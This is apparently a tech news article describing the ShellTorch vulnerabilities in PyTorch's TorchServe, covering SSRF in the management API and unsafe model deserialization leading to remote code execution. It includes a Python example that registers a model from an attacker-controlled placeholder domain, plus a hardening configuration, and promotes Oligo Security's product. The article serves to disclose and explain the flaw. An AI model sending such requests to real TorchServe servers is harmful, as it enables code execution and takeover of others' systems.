Large language models and other AI models are growing in popularity every day. From preventing accidents and detecting cancer to maintaining public safety, we rely on these AI applications to provide accurate information. Militaries are also applying AI to weapons systems in international confrontations.
Machine learning (ML) research has been largely driven by PyTorch, which stands out as a leading AI platform. PyTorch is used in over 90% of ML research publications, and that prominence makes it a tempting target for attackers looking to infiltrate AI-based systems. Notably, PyTorch serves a wide range of customers, including some of the biggest businesses in the world, such as Walmart, Amazon, OpenAI, Tesla, Azure, Google Cloud, and Intel.
However, researchers at Oligo Security inadvertently discovered that TorchServe's default configuration can be compromised. Oligo found a brand-new critical server-side request forgery (SSRF) vulnerability in the management interface that accepts model uploads from any domain and leads to remote code execution (RCE). By exploiting this chain of flaws, dubbed ShellTorch, an attacker can run code on the target server and take control of it.
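To make the exposure concrete, below is a minimal sketch of how TorchServe's management API registers a model by fetching it from a URL. The host name and model URL are hypothetical placeholders; 8081 is TorchServe's default management port.

```python
import requests

# Hypothetical host for illustration; 8081 is TorchServe's default management port.
MANAGEMENT_API = "http://torchserve-host.example:8081"

# TorchServe's management API registers a model by downloading a .mar archive
# from the given URL. In the vulnerable default configuration, URLs from any
# domain are accepted, which is what makes this endpoint an SSRF vector: a
# crafted model archive fetched from an attacker-controlled domain can lead
# to code execution on the server.
response = requests.post(
    f"{MANAGEMENT_API}/models",
    params={"url": "https://attacker-controlled.example/malicious-model.mar"},
    timeout=10,
)
print(response.status_code, response.text)
```

In a hardened deployment this request would fail, because the management interface would not be reachable from outside the host and the model URL would not match the server's allow-list.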
They also noticed that TorchServe is vulnerable to unsafe deserialization of a malicious model, which can likewise lead to remote code execution. Together, this combination of vulnerabilities can result in RCE and a complete takeover, especially given the substantial number of TorchServe deployments: tens of thousands of instances are exposed to these risks. The researchers observed that many openly available, unprotected instances are vulnerable to hacking, the injection of malicious AI models, and even a full server takeover. They emphasized that the flaws may affect millions of people, since servers across the world can be compromised, putting some of the biggest businesses in the world at immediate risk.
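As a hedged illustration of the kind of hardening involved, the snippet below shows a TorchServe config.properties that binds the management interface to localhost and restricts the domains from which models may be fetched. Both management_address and allowed_urls are documented TorchServe settings; the allow-listed domain is a placeholder.

```properties
# Bind the management API to the loopback interface instead of 0.0.0.0,
# so it is not reachable from outside the host.
management_address=http://127.0.0.1:8081

# Restrict model registration to an explicit allow-list of source URLs
# (comma-separated regexes). Replace the placeholder domain with your own
# trusted model repository.
allowed_urls=https://models.example.com/.*
```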
In response, the researchers developed a security product that detects threats within the runtime environment. Unlike tools that may miss certain causes of undesirable or unsafe application behavior, Oligo inspects the dynamic environment in which libraries are actually used, identifying issues that might otherwise be overlooked. In contrast to static analysis solutions, it can also spot anomalies in any code at runtime, whether that code is built with open-source libraries, proprietary third-party software, or custom code. Oligo also identifies potential sources of risk, such as insecure configuration settings. This matters because the high privileges granted by these vulnerabilities make it possible to view, change, steal, and delete AI models and sensitive data flowing into and out of the target TorchServe server.
The researchers emphasized that an additional advantage of Oligo is its ability to offer low-disruption fixes: addressing vulnerabilities and security issues does not necessarily require comprehensive patching or version changes, providing a more streamlined approach to enhancing system security.
Rachit Ranjan is a consulting intern at MarktechPost. He is currently pursuing his B.Tech from the Indian Institute of Technology (IIT), Patna. He is actively shaping his career in the fields of Artificial Intelligence and Data Science and is passionate about and dedicated to exploring them.